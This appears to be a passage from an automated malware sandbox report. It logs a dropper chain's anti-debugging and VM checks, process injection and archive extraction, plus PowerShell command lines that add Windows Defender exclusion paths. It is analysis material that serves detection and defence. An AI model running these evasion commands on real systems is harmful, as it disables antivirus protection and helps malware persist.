                              Source: ac68c6b737.exe, 00000015.00000003.2740579331.00000000051E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                              Source: zudFSfy.exe, 00000009.00000002.2486574208.0000000003595000.00000004.00000800.00020000.00000000.sdmp, kz8ZdyP.exe, 0000000D.00000002.2573081196.0000000002D27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q"C:\Windows\system32\vmGuestLib.dll@
                              Source: ac68c6b737.exe, 00000015.00000003.2740579331.00000000051E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                              Source: file.exe, 00000000.00000002.1754260362.00000000009CE000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1780519621.0000000000D5E000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1782906675.0000000000D5E000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmp, ac68c6b737.exe, 00000015.00000002.2764578126.000000000031C000.00000040.00000001.01000000.00000014.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                              Source: kz8ZdyP.exe, 0000000D.00000002.2573081196.0000000002D27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q 1:en-CH:Microsoft|VMWare|Virtual
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAPI call chain: ExitProcess graph end nodegraph_1-10076
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAPI call chain: ExitProcess graph end nodegraph_1-10063
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAPI call chain: ExitProcess graph end nodegraph_2-10573
                              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                              Anti Debugging

                              barindex
                              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeThread information set: HideFromDebugger
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeThread information set: HideFromDebugger
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeOpen window title or class name: regmonclass
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeOpen window title or class name: gbdyllo
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeOpen window title or class name: procmon_window_class
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeOpen window title or class name: ollydbg
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeOpen window title or class name: filemonclass
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeFile opened: NTICE
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeFile opened: SICE
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeFile opened: SIWVID
                              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeProcess queried: DebugPort
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04F30E14 rdtsc 0_2_04F30E14
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081652B mov eax, dword ptr fs:[00000030h]0_2_0081652B
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081A302 mov eax, dword ptr fs:[00000030h]0_2_0081A302
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00BAA302 mov eax, dword ptr fs:[00000030h]1_2_00BAA302
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00BA652B mov eax, dword ptr fs:[00000030h]1_2_00BA652B
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00BAA302 mov eax, dword ptr fs:[00000030h]2_2_00BAA302
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00BA652B mov eax, dword ptr fs:[00000030h]2_2_00BA652B
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BAA302 mov eax, dword ptr fs:[00000030h]6_2_00BAA302
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BA652B mov eax, dword ptr fs:[00000030h]6_2_00BA652B
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeProcess token adjusted: Debug
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeProcess token adjusted: Debug
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeProcess token adjusted: Debug
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeMemory allocated: page read and write | page guardJump to behavior

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\unrlkpjy"
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\unrlkpjy"
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeMemory written: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exe base: 400000 value starts with: 4D5AJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeMemory written: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exe base: 400000 value starts with: 4D5AJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exeMemory written: C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exe base: 400000 value starts with: 4D5A
                              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exe "C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exe "C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe "C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exe "C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exe "C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exe "C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeProcess created: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exe "C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exe"Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeProcess created: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exe "C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exe"Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeProcess created: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exe "C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exe"Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\unrlkpjy"
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeProcess created: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exe "C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exeProcess created: C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exe "C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exe"
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                              Source: ac68c6b737.exe, 00000015.00000002.2764578126.000000000031C000.00000040.00000001.01000000.00000014.sdmpBinary or memory string: AProgram Manager
                              Source: skotes.exe, skotes.exe, 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: }Program Manager
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00B8DD91 cpuid 6_2_00B8DD91
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
